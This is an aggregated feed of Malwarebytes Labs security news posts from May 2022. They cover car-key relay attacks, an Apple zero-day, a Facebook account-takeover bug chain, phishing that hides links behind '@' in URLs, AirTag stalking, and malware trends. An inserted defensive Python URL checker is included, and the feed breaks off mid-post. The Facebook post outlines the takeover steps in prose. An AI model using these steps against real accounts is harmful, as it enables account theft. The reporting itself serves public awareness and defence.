Techie Feeds

Car owners warned of another theft-enabling relay attack

Malwarebytes - Tue, 05/17/2022 - 20:16

Tesla owners are no strangers to seeing reports of cars being tampered with outside of their control. Back in 2021, a zero-click exploit aided a drone in taking over the car’s entertainment system. In 2016, we had a brakes and doors issue. 2020 saw people rewriting key-fob firmware via Bluetooth. And in January this year, a teen claimed he had managed to remotely hack into 25 Tesla vehicles.

This time, we have another Bluetooth key-fob issue making waves. Although there is a Tesla-specific advisory, there are also advisories covering the issue in general and a type of smart lock.

Bluetooth Low Energy and keyless entry systems

The researchers who discovered this issue are clear that it isn’t “just” a problem for Tesla. It’s more of a problem related to the Bluetooth Low Energy (BLE) protocol used by the keyless entry system. Bluetooth is a short-range wireless technology which uses radio frequencies and allows you to share data. You can connect one device to another, interact with Bluetooth beacons, and much more. Bluetooth is a perfect fit for something as commonplace as keyless door entry.

As the name suggests, BLE is all about providing functionality through very low energy consumption. As BLE is only active for very short periods of time, it’s a much more efficient way to do things.

The relay attack in action

Researchers demonstrated how this compromise of the keyless system works in practice. Though light on details, Bloomberg mentions it is a relay attack. This is a fairly common method used by people in the car research realm to try and pop locks.

To help describe a relay attack, it’s common to first explain how a Man in the Middle (MitM) attack works:

In cybersecurity, a Man-in-the-Middle (MitM) attack happens when a threat actor manages to intercept and forward the traffic between two entities without either of them noticing. In addition, some MitM attacks alter the communication between parties, again without them realizing.

For relay attacks, think of two people (or one person with two devices) sliding their way into the device-based communication. Some of the diagrams I’ve seen explaining this attack can be a little confusing, but this video explanation is perfect:

As you can see, two people approach the car. One pulls the handles to trigger the car’s security system into sending out a message. “Are you the owner of this car, are your keys the correct keys for this vehicle?” The authentication challenge is beamed out into the void. The second person is standing by the house with a device.

People often leave their car keys close to the front door. As a result, the keys will be within range of the second person’s device. It takes the fob’s response and beams it back to the criminal by the car. The device in their hand relays the fob’s authentication confirmation to the car and the door unlocks. They then repeat this process a second time. This is to fool the car into thinking the keys are present, at which point they’re able to drive away.

A gear-shift in criminal perspective

Criminals are after maximum gain for minimum effort. They don’t want to attract attention from law enforcement. The sneakier they can be, the less commotion they cause, and the better it’s going to be for them in the long-term.

Think about how seamless a relay approach is to car theft. It’s quick, it’s easy, and it’s completely silent. Consider how much money a professional outfit pulling these car heists can generate. The alternative is messy break-ins, noise, rummaging for keys in a house full of screaming people and barking dogs. Not to mention a significantly increased chance of being caught. If you were a career criminal, which approach would you favour?

A problem which refuses to go away

Relay attacks on cars have been around for several years now. Stolen vehicles are the go-to example of relay attacks if you go looking for more information on the technique. Advice for avoiding relay attacks is widespread, from keeping keys away from the front door (which you should do anyway) to placing them in a signal-blocking bag.

For the Tesla-specific attack, a relay device was placed “within roughly 15 yards” of the smartphone/key-fob, with the other plugged into a laptop close to the vehicle. You can see more information about the more general forms of attack here.

The article mentions that there’s no evidence of this Tesla tomfoolery having happened in the wild. Even so, relay attacks can and do take place. If your car operates a keyless system, take this latest report as a heads-up to ensure your vehicle is safe from attack no matter the make or model.

The post Car owners warned of another theft-enabling relay attack appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Update now! Apple patches zero-day vulnerability affecting Macs, Apple Watch, and Apple TV

Malwarebytes - Tue, 05/17/2022 - 20:00

Apple has released security updates for a zero-day vulnerability that affects multiple products, including Mac, Apple Watch, and Apple TV.

The flaw is an out-of-bounds write issue—tracked as CVE-2022-22675—in AppleAVD, a decoder that handles specific media files.

An out-of-bounds write or read flaw lets a program access memory outside the buffer it was given, including memory allocated to more critical functions. This could allow an attacker to write code to a part of memory where it will be executed with permissions that the program and user should not have.

Attackers could take control of affected devices if they exploit this flaw.

CVE-2022-22675 is the same vulnerability that affected macOS Monterey 12.3.1, iOS 15.4.1, and iPadOS 15.4.1. For those systems, the flaw was patched in March.

This latest batch of updates adds improved bounds checking for additional Apple products running specific operating systems, namely macOS Big Sur 11.6.6, watchOS 8.6, and tvOS 15.5. These updates apply to Macs running Big Sur, Apple Watch Series 3 and later, and Apple TV (4K, 4K 2nd generation, and 4K HD).

Apple says it’s aware this flaw is currently being abused in the wild. It didn’t go into detail, likely to give customers time to patch up their Apple devices.

BleepingComputer has noted that attacks against CVE-2022-22675 might only be targeted in nature. However, if you’re using any or all of the Apple products mentioned above, it is still wise to apply updates as soon as you can.

Stay safe!

The post Update now! Apple patches zero-day vulnerability affecting Macs, Apple Watch, and Apple TV appeared first on Malwarebytes Labs.


Gmail-linked Facebook accounts vulnerable to attack using a chain of bugs—now fixed

Malwarebytes - Tue, 05/17/2022 - 19:37

A security researcher has disclosed how he chained together multiple bugs in order to take over Facebook accounts that were linked to a Gmail account.

Youssef Sammouda states it was possible to target all Facebook users but that it was more complicated to develop an exploit, and using Gmail was actually enough to demonstrate the impact of his discoveries.

Linked accounts

Linked accounts were invented to make logging in easier. You can use one account to log in to other apps, sites and services. The most commonly used is the link between Facebook and Instagram, so we will use that as an example. Log in to one account and you are also practically logged in at the other. All you need to do to access the account is confirm that the account is yours.

Since 2009, Facebook has supported myOpenID, which allows users to log in to Facebook with their Gmail credentials. To put it in a simpler way, this means that if you are currently logged in to your Gmail account, the moment you visit Facebook, you will be automatically logged in.

Sandboxed CAPTCHA

The first discovery that enabled this takeover method lies in the fact that Facebook uses an extra security mechanism called “Checkpoint” to make sure that any user that logs in is who they claim to be. In some cases Checkpoint presents those users with a CAPTCHA challenge to limit the number of tries.

Facebook uses Google CAPTCHA and as an extra security feature the CAPTCHA is put in an iFrame. The iFrame is hosted on a sandboxed domain ( to avoid adding third-party code from Google into the main domain ( An iFrame is a piece of HTML code that allows developers to embed another HTML page on their website.

Now, for some reason, probably for logging purposes, the URL for the iFrame includes the link to the checkpoint as a parameter.

For example, let’s say the current URL is In that case the iframe page would be accessible through this URL:

The attacker can replace the referrer part in the URL by changing it into a next parameter. This allows the attacker to send the URL including the login parameters to the sandbox domain. Now it is time to find a way to grab it from there, which is where cross-site scripting (XSS) comes in.


XSS is a type of security vulnerability, and can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. Attackers can use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy.

The same-origin policy (SOP) is where a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. This policy prevents a malicious script on one page from obtaining access to sensitive data on another web page.

In this case that step was easy, since Facebook allows developers to test certain features and makes it possible for them to upload custom HTML files. The creator can upload these HTML files to the domain. That domain, as we saw earlier, is also used for the Google CAPTCHA, which allows the attacker to bypass the same-origin policy since the target site and the custom script share the same domain.


CSRF is short for cross-site request forgery. In a CSRF attack, an innocent end user is tricked by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include inadvertent client or server data leakage, change of session state, or manipulation of an end user’s account.

In his attack script, Youssef used undisclosed CSRF attacks to log the target user out and later log them back in through the Checkpoint.


OAuth is a standard authorization protocol. It allows us to get access to protected data from an application. An OAuth Access Token is a string that the OAuth client uses to make requests to the resource server.

In this case, attackers can log out the current user and then log them back in to the attacker account which is in the Checkpoint state. But how does that allow the attacker to take over the Facebook account? By intercepting an OAuth Access Token string.

This is done by targeting a third-party OAuth provider that Facebook uses. One of these providers is Gmail. Gmail sends back the OAuth Access token to for the logged in user. And since the attacker can steal the URL including the login parameters by sending them to the sandbox domain, they can intercept the OAuth Access Token string and the id_token of the user.


Summarized, the attacker can upload a script to the Facebook sandbox and try to trick his target(s) into visiting that page by sending them the URL.

Simplified, the script will:

  1. Log out the user from his current session (CSRF)
  2. Send them to the Checkpoint to log back in (CSRF)
  3. Open a constructed URL that redirects the target to Facebook.

Once the target has visited the page with the script outlined above, the attacker can start harvesting the strings they need to take over the Facebook account.

  1. The attacker waits for the victim to log in and can later extract the Google OAuth Access Token string and id_token
  2. Using the email address included in the id_token they can start a password recovery process
  3. Now the attacker can construct a URL to access the target account with all the data they have gathered

How to unlink accounts

Some sites will offer to log you in using your Facebook credentials. The same reasoning that is true for using the same password for every site is true for using your Facebook credentials to login at other sites. We wouldn’t recommend it because if anyone gets hold of the one password that controls them all, you’re in even bigger trouble than you would be if only one site’s password is compromised.

You can check which accounts are linked to your Facebook account by opening the Facebook settings menu. Scroll down and open Settings & Privacy, then open Settings. At the bottom on the left, use the Accounts Center button. Tap Accounts & Profiles. There you can see a list of the accounts linked to your Facebook account. You can remove any unwanted linked accounts there.

Facebook fix

Youssef says he reported the issue to Facebook in February. It was fixed in March and a $44,625 bounty was awarded earlier this month.

We interviewed Youssef last year. He told us he’s submitted at least a hundred reports to Facebook which have been resolved, making Facebook a safer platform along the way.

The post Gmail-linked Facebook accounts vulnerable to attack using a chain of bugs—now fixed appeared first on Malwarebytes Labs.


Long lost @ symbol gets new life obscuring malicious URLs

Malwarebytes - Tue, 05/17/2022 - 14:41

Threat actors have rediscovered an old and little-used feature of web URLs, the innocuous @ symbol we usually see in email addresses, and started using it to obscure links to their malicious websites.

Researchers from Perception Point noticed it being used in a cyberattack against multiple organizations recently. While the attackers are still unknown, Perception Point traced them to an IP in Japan.

The attack started with a phishing email pretending to be from Microsoft, claiming the user has messages that have been embargoed as potential spam. (Using familiar, transactional messages from well-known brands like Microsoft has become a popular tactic for scammers, as a way to defeat spam filters and keen-eyed users.)

The message reads:

You have new 5 held messages. You can release all of your held messages and permit or block future emails the senders, or manage messages individually.

If the recipient clicks any of the links in the email, they are directed to a phishing page made to look like an Outlook login page.

If the recipient follows the often-repeated advice to hover their pointer over the links before clicking them, to see where they go, they will see this weird-looking URL, and probably be none the wiser:


This is almost certainly designed to bamboozle users, but to your computer it looks fine. As weird as this URL appears, it is actually valid and acceptable, and your browser will happily parse it for you.

Users who clicked on the link were passed through a chain of redirects before ending up at a phishing page that looks like the Outlook login screen.

The phishing site is a copy of the Outlook login page

Reading the URL

As weird as it looks, the URL in this phishing campaign sticks to the rules of what’s allowed in a web address. The part you see least often is the @ symbol. RFC 3986 refers to anything after https:// and before the @ symbol, highlighted below, as userinfo. This part of the URL is for passing authentication information like a username and password, but it is very rarely used, and is simply ignored as a so-called “opaque string” by many systems.


The last part of the URL after the # is also ignored when you click the link. This is called the fragment identifier and it represents a piece of the destination page. The browser might use it to scroll to a section of the destination page, or it might be used to pass information to the destination page, but it plays no part in determining what the destination actually is.

In this case the fragment ID—ZmluYW5jZUBuZ3BjYXAuY29t—appears to be a unique ID that identifies the email address the phish was sent to. If it’s removed, the link works but when you reach the final destination it simply shows a loading icon, perhaps to hide the site’s true intentions to accidental visitors or researchers.

What we are left with when we remove the parts of the link that are ignored by the browser is a very ordinary-looking link. Exactly the kind of thing you might think is suspicious in an email that says it’s from Microsoft.

As you probably know, is a URL shortening service. The link redirects users to another URL, likely used for tracking, which itself redirects users to the phishing page.

Does your browser support the @ symbol?

If you are one of the 2.6 billion people using Chrome, the answer is “yes”: URLs that use the @ symbol work in Chrome and other Chromium-based browsers such as Vivaldi, Brave, and Microsoft Edge.

The latest version of Microsoft’s Internet Explorer doesn’t parse URLs with the @ delimiter though.

Firefox and Firefox-based browsers, such as Tor and Pale Moon, are also affected.

And what about Safari?

According to Thomas Reed, Malwarebytes’ Director of Mac and Mobile, “This technique appears to work in Safari and all other major Mac browsers. Firefox will show a warning when attempting to visit such a link. Unfortunately, Safari—the most popular browser on macOS—does not display a warning and opens the link without objection, as does Chrome.”

Reed also points out that email software will often look for URLs in plain text emails and convert them to clickable links, but the @ symbol seems to prevent this. According to Reed: “The URL used by the phishing campaign does not become a clickable link by itself.” The links will still work in HTML emails, so this isn’t much of a barrier, just a feather in the cap of holdouts who insist on viewing their emails in plain text!

The wide support for the confusing and little-used @ symbol could see it used more widely. In a Threat Post interview, Perception Point’s Vice President of Customer Success and Incident Response, Motti Elloul, predicted that this won’t be the last time we’ll see phishing attacks taking advantage of it.

“The technique has the potential to catch on quickly, because it’s very easy to execute,” he said. “In order to identify the technique and avoid the fallout from it slipping past security systems, security teams need to update their detection engines in order to double check the URL structure whenever @ is included.”
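The following is an added example, not code from the Malwarebytes article or from Perception Point, showing how Python’s standard urllib.parse treats the userinfo and fragment parts described in “Reading the URL”, and a structural check of the kind Elloul recommends for detection engines. The hostnames, path and fragment value are constructed for this example and are not the campaign’s real link.

```python
"""Dissect a URL whose authority section carries RFC 3986 userinfo.

Shows what the browser actually navigates to once the decoy userinfo and the
fragment are discarded, plus a simple check a mail or URL filter could apply.
"""
from urllib.parse import urlsplit, urlunsplit

# Constructed samples (hypothetical hosts; not the campaign's real links).
DECOY_URL = ("https://login.microsoft.example@redirector.example.net"
             "/r/7f3a?k=1#dXNlckBleGFtcGxlLmNvbQ==")
PLAIN_URL = "https://redirector.example.net/r/7f3a?k=1"
CREDS_URL = "https://alice:s3cret@intranet.example.org/wiki"


def split_userinfo(url):
    """Return (userinfo, hostinfo) from the authority; userinfo is '' if absent.

    RFC 3986 puts the user part before the *last* '@' in the authority, so a
    decoy such as 'login.microsoft.example' lands in userinfo, never in host.
    """
    netloc = urlsplit(url).netloc
    userinfo, sep, hostinfo = netloc.rpartition("@")
    return (userinfo, hostinfo) if sep else ("", netloc)


def browser_destination(url):
    """Rebuild the URL as the browser resolves it: no userinfo, no fragment."""
    p = urlsplit(url)
    _, hostinfo = split_userinfo(url)
    # hostinfo keeps host[:port]; using hostname alone would drop a custom port.
    return urlunsplit((p.scheme, hostinfo, p.path or "/", p.query, ""))


def userinfo_looks_like_hostname(userinfo):
    """Heuristic: userinfo shaped like a DNS name (dotted labels, no ':' password
    separator) is a decoy meant to be read as the site, not real credentials."""
    if not userinfo or ":" in userinfo:
        return False
    labels = userinfo.split(".")
    return len(labels) >= 2 and all(
        label and label.replace("-", "").isalnum() for label in labels)


def analyze_url(url):
    """Summarise the structural facts a detection engine would want to log."""
    p = urlsplit(url)
    userinfo, _ = split_userinfo(url)
    return {
        "has_userinfo": bool(userinfo),
        "decoy_userinfo": userinfo_looks_like_hostname(userinfo),
        "has_fragment": bool(p.fragment),
        "destination_host": p.hostname or "",
        "destination": browser_destination(url),
    }


def suspicious_urls(urls):
    """Return only the URLs whose userinfo reads like a hostname (the @ trick)."""
    return [u for u in urls if analyze_url(u)["decoy_userinfo"]]


if __name__ == "__main__":
    for url in (DECOY_URL, PLAIN_URL, CREDS_URL):
        info = analyze_url(url)
        print(f"{url}\n  -> {info['destination']}  decoy={info['decoy_userinfo']}")
```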

The post Long lost @ symbol gets new life obscuring malicious URLs appeared first on Malwarebytes Labs.


AirTag stalking: What is it, and how can I avoid it?

Malwarebytes - Tue, 05/17/2022 - 14:12

More voices are being raised against the use of everyday technology repurposed to attack and stalk people. Most recently, it’s reported that Ohio has proposed a new bill in relation to electronic tagging devices.

The bill, aimed at making short work of a loophole allowing people with no stalking or domestic violence record to use tracking devices, is currently in the proposal stages. As PC Mag mentions, 19 states currently ban the use of trackers to aid stalking.

Dude, where’s my car?

Using tech to find missing items is nothing new. Back in the 80s, my dad had one of the new wave of tools used to find your lost keys. You put a small device on your keychain, and when they inevitably went missing, you whistled. The device, assuming it was nearby, would beep or whistle back. That is, it would if the range wasn’t awful and it frequently didn’t respond to your best whistle attempts.

Skip forward enough years, and we had a similar concept but with Bluetooth and radio frequency. The range on those isn’t great either, so their use is limited.

Step up to the plate, tracker devices.

What is an AirTag?

There are many types of tracking device, but AirTags are, unfortunately for Apple, the ones most closely associated with this form of stalking.

Find My, an app for Apple mobiles, is an incredibly slick way to keep track of almost any Apple product you can think of. Making your lost phone make a noise, offline finding, and sending the last location when battery is low are some of the fine-tune options available.

An AirTag is a small round device which plugs right into the Find My options. The idea is a supercharged version of ye olde key whistler. Misplace an item attached to an AirTag, and when you get close enough you’ll even have Precision Finding kicking in to guide you to the lost item.

This is all incredibly helpful, especially if you’re good at misplacing things. Even better if something is stolen. Where it goes wrong is when people with bad intentions immediately figure out ways they can harass people with it.

A stalker’s life for me

Back in January, model Brooks Nader claimed someone placed an AirTag in her coat. Whoever was responsible used it to follow her around for several hours. She only became aware of what was happening because her phone alerted her to the tag’s presence.

However, this is an Apple-specific product, which means not all devices will be able to flag it. Android users are resorting to downloading standalone apps which can flush out unwanted AirTag stalkers. Meanwhile, the case numbers themselves are steadily increasing across multiple regions. Smart stalkers will place tags on items or in places victims won’t suspect. A tag under the car means victims may never even find out they’ve been stalked in the first place.

Apple pushes back on AirTag stalking

This isn’t great news for any company faced with a sudden wave of people abusing their devices. Apple is trying to lead the charge against these practices by making it harder for stalkers.

  • Improving the accuracy of “unknown accessory detected” notices
  • Adding support documents for people who believe they may be being stalked.
  • Implementing notices which say “tracking without consent is a crime”

Advice for people worried about AirTag stalking

Apple’s support document lists two ways to discover unwanted tracking.

  1. If you have an iPhone, iPad, or iPod touch, Find My will send a notification to your Apple device. This feature is available on iOS or iPadOS 14.5 or later. To receive alerts, make sure that you:
    Go to Settings > Privacy > Location Services, and turn Location Services on.
    Go to Settings > Privacy > Location Services > System Services. Turn Find My iPhone on.
    Go to Settings > Privacy > Location Services > System Services. Turn Significant Locations on to be notified when you arrive at a significant location, such as your home.
    Go to Settings > Bluetooth, and turn Bluetooth on.
    Go to the Find My app, tap the Me tab, and turn Tracking Notifications on.
  2. If you don’t have an iOS device or a smartphone, an AirTag that isn’t with its owner for a period of time will emit a sound when it’s moved. This type of notification isn’t supported with AirPods.

Any alert on your mobile device that a tracker is nearby allows you to make the tracker produce a noise via your phone. You can make this noise repeat as often as you want until the device is found.

Disabling the AirTag

If you can’t find the physical object, don’t worry. You can disable it, again using your phone. Apple’s advice:

To disable the AirTag, AirPods, or Find My network accessory and stop it from sharing its location, tap Instructions to Disable and follow the onscreen steps. After the AirTag, AirPods, or Find My network accessory is disabled, the owner can no longer get updates on its current location. You will also no longer receive any unwanted tracking alerts for this item.

Apple has been quite visible in both drawing attention to the problem and providing accessible and straightforward solutions to shutting unwanted tracking down. We can only hope that other companies whose trackers are being misused in this way are doing their part too.

The post AirTag stalking: What is it, and how can I avoid it? appeared first on Malwarebytes Labs.


“Look what I found here” phish targets Facebook users

Malwarebytes - Tue, 05/17/2022 - 10:54

Facebook-themed messages are a frequent source of bogus links from both spam and compromised accounts. Whether you receive the messages via SMS, the Messenger app, or just inside regular web chat, it pays to be careful. A wide variety of attacks use bogus messages as their launchpad, and the risk of account compromise is ever-present. Phishing is not the only threat. Scammers will also happily send “check this out” messages and direct you to malware. This is why it’s crucial to be careful around links…any link. You just never know.

One such phishing message is currently doing the rounds in Dutch, and it plugs into a sense of FOMO to encourage you to click the link. It was first observed back in March, and appears to be making a comeback.

How does this phish attack work?

This is the message currently in circulation, being distributed through a compromised account:

Kijk eens wat ik hier heb gevonden?? [url]

The message says “Look what I found here”.

This is a very common tactic, not giving anything away and almost baiting you into clicking. There are a few others along these lines being sent to people in Facebook Messenger at the moment. One style of message asks something along the lines of “Have you seen who died/Guess who died”. The answer, of course, is that nobody has died. However, the aim of the game is to have you panic and hit the link without thinking.

It’s a similar technique in play here, although nowhere remotely as panic-inducing.

All the same, the link redirects to a fake Facebook page on what looks like a compromised photography website.

The site says “Facebook needs to verify that it’s you, log in to continue” and asks for mobile number/email and password.

Hitting the login button submits the data and redirects you through several different domains. In testing, we kept hitting a Google 404 error but you may well end up somewhere else depending on region, type of browser, device, and so on.

If you’ve entered your login after clicking through from a random message in this fashion, stop what you’re doing. Go to Facebook and change your password as soon as you possibly can.

The power of “friendly” messaging

The big problem with rogue messages via IM is the aspect of sender trust. If a link is sent to you from a total stranger on a public platform like Twitter, you’ll probably be sceptical and treat it with the caution it deserves. An SMS from a number you don’t recognise? They have some success depending on scam type, but you’d probably expect a banking phish or a fake parcel delivery message through that route.

But if you get a message from someone within your closed network of friends and family, where you may interact dozens or even hundreds of times a day, then it’s likely you’ll be clicking those links with a lot more confidence.

Sadly, accounts belonging to those you trust can be hijacked like any others. If your dad’s Facebook account was compromised yesterday and you woke to a link and a message which reads “Look what I found here”, what would you do?

Phishers know that if they can crack an account, it’ll almost certainly be allowed to send messages to people in its immediate circle as their security settings will permit them access. After all, you don’t add your closest relatives to Facebook and then prevent them from sending you messages.

Tips to avoid falling for rogue messages

  • Watch out for messages which don’t logically follow on from the natural flow of a conversation, or a few hours after you stopped talking. “This you”, “Have you seen this photo”, “Did you hear who died”, “OMG I can’t believe it” all tied to a URL should raise some red flags.
  • If you’re presented with a “Login to view content” box, question why that is. If you’re on the Facebook website talking to someone and already logged in, there should be no reason why you’d be asked to login again. Check the URL. Does it say Or is it a totally unrelated domain?
  • If you have an alternative method of communication with the person who sent you the message, try it. Ask them if they sent you a message on Facebook, and wait for their response before doing anything.
  • Enable 2-factor authentication (2FA). If you hand over your password to a phishing page, the phisher can’t do much with it while you’re protected with 2FA. This isn’t a silver bullet though, as more and more phishers are also taking 2FA codes with them when they phish your details.
  • Add login alerts to your Facebook account. If someone does manage to get hold of your login credentials and access your account, you’ll get notified by Facebook as soon as this happens so you can grab your account back as soon as possible.

Once your friend or family member regains access to their account, you can point them to these tips for keeping their own account locked down too. This way, you’ll be that little bit safer next time account-harvesting phishers are on the prowl.

Stay safe out there!

The post “Look what I found here” phish targets Facebook users appeared first on Malwarebytes Labs.


Why MRG-Effitas matters to SMBs

Malwarebytes - Mon, 05/16/2022 - 13:07

When selecting the right cybersecurity vendor to protect their operations, small- and medium-sized businesses (SMBs) can lean on several third-party research organizations that analyze which cybersecurity products can best prevent, detect, and clean up various types of cyberattacks today.

But these tests can sometimes assume a level of end-user complexity—and funding and staffing—that the average SMB might lack. Without a full-time security team, or even a single full-time internal IT hire, an SMB could unwittingly purchase a cybersecurity product that, while effective, requires a level of expertise they simply do not have.

This is where one third-party research team, in particular, can help.

MRG-Effitas, which produces quarterly reports about cybersecurity products that publicly participate in evaluations, focuses its analyses on “real world” malware attacks and detection capabilities. Not only do the researchers test malware samples that are currently infecting endpoints across the world, but the researchers also stress the importance of simple, effective notifications that will help the average user respond to any detected cyberthreat.

“Simulating normal user behaviour means that we pay special attention to all alerts given by security applications,” wrote the researchers in their most recent quarterly report for their program, the “360° Assessment & Certification.”

The 360° Assessment & Certification combines several tests that are then grouped into four separate certifications. Based on how a cybersecurity product performed in certain tests, that product will either earn a certificate or not. This almost-binary representation of a product’s performance is simple and effective, and it can help to quickly inform an SMB about whether a certain product is right for their company.

At the core of the MRG-Effitas certification process—which tests how products respond to known exploits, ransomware, botnets, adware, and more—is the user.

“A pass is given only when alerts are straightforward, and clearly suggest that the malicious action should be blocked,” the report said. “With this in mind, it is very important to note that the best choice for an average user is to keep things as simple as possible and not to overwhelm them with cryptic pop-ups, alerts or questions.”

Testing and certification

The 360° Assessment & Certification by MRG-Effitas involves the following nine rounds of testing:

  • In the Wild/Full Spectrum Test
  • PUA/Adware Test
  • Exploit/Fileless Test
  • Real Botnet Test
  • Banking Simulator Test
  • Ransomware Simulator Test
  • False Positive Ransomware Test
  • False Positive Test
  • Performance Test

Each test has a specific purpose: how a product responds when an end-user visits a malicious URL that delivers malware; whether it detects non-malicious but meddlesome applications such as adware; how it handles live ransomware samples observed in the wild, and how it handles simulated ransomware samples developed by MRG-Effitas. Importantly, MRG-Effitas also measures the performance load of each product, timing certain everyday tasks on devices that have the product installed.

While MRG-Effitas performs testing in the above nine categories, it only awards certificates in four categories: The 360° Assessment, the 360° Exploit Degree, the 360° Online Banking Degree, and the 360° Ransomware Degree.

For the 360° Assessment, MRG-Effitas assigns two levels of certification—Level 1 and Level 2—depending on how successfully a cybersecurity product detected the cyberthreats that were launched at it during testing. A vendor only receives Level 1 certification if it detected all threats on “first exposure or via behaviour protection,” the report said, and it passed the Real Botnet Test.

The malware load used during the 360° Assessment is significant. In the most recent round, it involved 360 “In The Wild” samples that included: “20 trojans, 54 backdoors, 50 financial malware samples, 53 ransomware, 49 spyware, 84 malicious documents, [and] 50 malicious script files.”

Just four products publicly received a Level 1 certification in the recent 360° Assessment: Malwarebytes Endpoint Protection, Bitdefender Endpoint Security, Microsoft Windows Defender, and Symantec Endpoint Protection.

A similar test deploys 50 financial malware samples against the detection and protection capabilities of the cybersecurity products, along with simulated banking malware. Five products publicly received the 360° Online Banking Certification: Malwarebytes Endpoint Protection, Avira Antivirus Pro, Bitdefender Endpoint Security, ESET Endpoint Security, and Symantec Endpoint Protection.

Ransomware simulations

In just the past decade, ransomware has evolved tremendously. Developers of this infamous category of malware have gone from asking individuals for measly sums of money to building entire business models in which they license their ransomware to other threat actors. When those threat actors successfully hit a business (access to which they may themselves have bought from yet other threat actors), the original ransomware developers take a cut of whatever payment is eventually made. To make matters worse, threat actors have also begun deploying ransomware that not only encrypts a company’s files but first exfiltrates any sensitive data, which they then use as a second point of leverage: Pay up, or your data will be published for everyone to see.

The researchers at MRG-Effitas, recognizing this rapid pace of ransomware evolution, have, for years, tested cybersecurity products against ransomware samples developed in-house that could represent where ransomware development is headed in just months or years.

In the most recent 360° Assessment & Certification, MRG-Effitas deployed 53 ransomware samples against the cybersecurity products, plus an additional four simulated ransomware samples. To achieve the 360° Ransomware Certification, a product must have protected the device from all 53 ransomware samples and all four simulated samples, and it must have passed the false positive ransomware test.

In the most recent round of testing, all nine publicly-evaluated cybersecurity products achieved ransomware certification.


Understanding whether a cybersecurity product works well is, obviously, important. But of similar importance to SMBs is understanding what impact a cybersecurity product will have on a suite of endpoints. Without large budgets that could allow for constantly refreshed, new devices to be purchased, SMBs should consider how much a cybersecurity product could slow down their organizations’ devices.

Thankfully, MRG-Effitas analyzes cybersecurity products based on their impact on performing simple operations, like downloading a file, opening a Microsoft Office program, or opening a website. The analysis also measures the time spent performing a security software update and the CPU usage during the update process.

Unlike the certificates offered by MRG-Effitas for other categories, there is no certificate or “pass/fail” result when testing performance. Instead, SMBs can look at the performance measurements for each product in the latest 360° Assessment & Certification.

Less “interpretation,” quicker answers

The simplicity of MRG-Effitas’ 360° Assessment & Certification gives SMBs a quick guide into what cybersecurity products could be the right fit for them. Without having to dive into countless interpretive reports from each cybersecurity vendor, SMBs can instead look at the most recent 360° Assessment & Certification and ask themselves: Which of these products received certification and which did not?

Knowing that MRG-Effitas hews its testing ideology to the user—only offering certifications for products that clearly notify and warn users about how to respond to a threat—SMBs can be sure that whatever tool they choose will, at the very least, be easy to use on their end.

The post Why MRG-Effitas matters to SMBs appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How COVID-19 fuelled a surge in malware

Malwarebytes - Mon, 05/16/2022 - 12:28

2021 saw a massive surge in detections of malware, adware, and Potentially Unwanted Programs (PUPs). It didn’t matter what the computers were used for or what operating system they ran—across business and home computers, on Windows and on Mac, detections went up, enormously.

Detections of malware on Windows business machines were 143% higher in 2021 than in 2020, and 65% higher on consumer machines.

Windows malware detection totals 2019-2021

Detections of malware, adware, and PUPs on macOS increased almost 220%.

Mac malware, adware and PUP detection totals 2019-2021

The background to this extraordinary jump in detections is the coronavirus pandemic, so we call this surge in detections the “Covid bounce”.

The Covid bounce

In 2020, the recently-discovered novel coronavirus, and the restrictions put in place to slow its progress, caused trillions of dollars of lost economic activity and a mass migration of knowledge workers from offices to homes.

Almost all forms of business suffered—even illegal ones like cybercrime. Crooks were just as likely to get COVID-19 as anyone else, and the targets they preyed upon changed beyond recognition.

Many businesses wound down or folded, and those that didn’t had to upend their IT infrastructure overnight to support working from home. How people worked, where they worked, the tools they used, and the things they cared about were all in flux.

No wonder then, that in 2020, malware detections on Windows business machines fell 24%.

The effect was not spread evenly across all types of malware though. Detections of Emotet and TrickBot collapsed by 89% and 69% respectively, leading some to speculate that while these highly sophisticated forms of malware were extremely effective at permeating corporate networks they may be poorly adapted to exploit the work-from-home environment.

Meanwhile, detections of hacking tools, information stealers, and other malware that could help criminals better understand the transformation in their victims’ environments, increased considerably.

In 2021, as restrictions lifted gradually around the world, and as organisations and the criminals preying on them adapted to remote and hybrid work, detection numbers climbed precipitously.

And they didn’t simply return to the pre-Covid status quo, they soared past 2019’s numbers. In 2021, the detection numbers for business threats were 85% higher than in 2019, and consumer threat detections were 47% higher.

Cryptocurrency values soared in 2021 and, to nobody’s surprise, detections of malware that mines cryptocurrencies increased more than 300 percent.

Adware, spyware, and worms all displayed an enormous bounce back in 2021, climbing 200%, and detections of email threats showed a considerable “Covid bounce” too. But while the old guard of Emotet and TrickBot remained, they were not the presence of old as several new pretenders jostled for position.

It is impossible to say why detections bounced back so alarmingly last year, but the plain fact is that the world now is not the world of 2019. Events like the coronavirus pandemic have far-reaching effects that go far beyond the immediate, obvious and tragic health consequences, affecting all walks of life, even the security of your servers, laptops, and remote workers.

The pandemic accelerated the transition from a bricks-and-mortar to online existence, and for many businesses and services there is no going back.

After a period of adjustment and uncertainty in 2020, cybercrime seems to have emerged supremely well adapted to this new reality.

You can learn more about the Covid bounce and how it changed the outlook for cyberthreats into 2022 and beyond in the Malwarebytes 2022 Threat Review.

The post How COVID-19 fuelled a surge in malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake reCAPTCHA forms dupe users via compromised WordPress sites

Malwarebytes - Mon, 05/16/2022 - 11:54

Researchers at Sucuri investigated a number of WordPress websites complaining about unwanted redirects and found websites that use fake CAPTCHA forms to get the visitor to accept web push notifications.

These websites are a new wave of a campaign that leverages many compromised WordPress sites.


CAPTCHA (“Completely Automated Public Turing test to tell Computers and Humans Apart”) is one of the annoyances that we have learned to take for granted when we browse the Internet. Scientists developed CAPTCHA as a method to tell humans and bots apart, so as to keep bots from accessing sites or systems where they are not welcome.

Google bought reCAPTCHA in 2009 and still owns it. It is a CAPTCHA system expressly developed to reduce the amount of user interaction needed. The original version asked users to decipher hard-to-read text or match images. Version 2 only asked users to decipher text or match images if its analysis of cookies and canvas rendering suggested the page had been loaded automatically rather than by a person. Since version 3, reCAPTCHA doesn’t interrupt users at all: it runs in the background when users load pages or click buttons and returns a risk score to the site.

The basic version of a real reCAPTCHA the threat actors used as a template to create the fake ones looks like this:

legitimate reCAPTCHA

The campaign

